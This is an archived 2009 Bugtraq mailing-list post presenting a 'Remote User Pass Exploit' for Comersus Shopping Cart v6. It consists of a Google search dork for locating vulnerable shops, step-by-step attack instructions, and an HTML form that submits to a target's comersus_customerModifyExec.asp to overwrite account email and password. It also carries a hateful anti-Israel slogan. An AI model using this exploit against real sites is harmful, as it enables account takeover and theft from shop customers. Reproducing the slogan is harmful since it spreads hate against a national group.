lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 12 Jan 2009 12:47:41 -0000
From: ajannhwt@...mail.com
To: bugtraq@...urityfocus.com
Subject: Comersus Shopping Cart <= v6 Remote User Pass Exploit

*******************************************************************************
# Title   :  Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author  :  "ajann" from Turkey
# Contact :  :(
# S.Page  :  http://www.comersus.com/
# $$      :  Free
# Dork    :  Powered by Comersus v6 Shopping Cart
# DorkEx  :

http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=

KAHROLSUN ISRAEL

-Register Site
-Login
-Open Exploit
-Edit: User Email , User Password
-Submit Form

*******************************************************************************

<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
  <table width="421" border="0">  
      <tr> 
      
    </tr>
    <tr> 
      <td width="168">Name</td>
      <td width="220">      
        <input type=text name=customerName value="test">
      </td>
    </tr>    
    <tr> 
      <td width="168">Last Name</td>
      <td width="220">      
        <input type=text name=lastName value="test">
      </td>
    </tr>
    <tr> 
      <td width="168">Company</td>
      <td width="220">      
        <input type=text name=customerCompany value="test">
      </td>
    </tr>
    <tr> 
      <td width="168">Phone</td>
      <td width="220">        
       <input type=text name=phone value="123456789">
      </td>
    </tr>
    <tr> 
      <td width="168"><strong>Email</strong></td>
      <td width="220">   
    
        <input type="text" name="email" value="Please Add Mail"> 
        Edit
      </td>
    </tr>
    <tr> 
      <td width="168"><strong>Password</strong></td>
      <td width="220">         
        <input type=text name=password value="Please Add Pass"> 
        Edit
      </td>
    </tr>
    <tr> 
      <td width="168">Address</td>
      <td width="220">         
        <input type=text name=address value="test">
      </td>
    </tr>
    <tr> 
      <td width="168">Zip</td>
      <td width="220">         
        <input type=text name=zip value="08050">
      </td>
    </tr>
    <tr> 
      <td width="168">State</td>
      <td width="220">         
        
      <SELECT name=stateCode size=1>
      <OPTION value="">Select the state
        <option value="1">Please Type County below
      </OPTION>
      </SELECT>
      </td>
    </tr>
    <tr> 
      <td width="168">Non listed state</td>
      <td width="220">         
       <input type=text name=state value="">
      </td>
    </tr>
    <tr> 
      <td width="168">City</td>
      <td width="220">         
        <input type=text name=city value="test">
      </td>
    </tr>    
    <tr> 
      <td width="168">Country</td>
      <td width="220">                 
        
      <SELECT name=countryCode>
      <OPTION value="">Select the country
        <option value="AF" selected>AFGHANISTAN
      </OPTION>
      </SELECT>       
      </td>
    </tr>
    
    
    
    <tr> 
      <td width="168">&nbsp;</td>
      <td width="220">&nbsp;</td>
    </tr>
    <tr> 
      <td colspan="2">        
          <input type="submit" name="Modify" value="Modify">                            
      </td>
    </tr>
    </table>
   </form>          

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ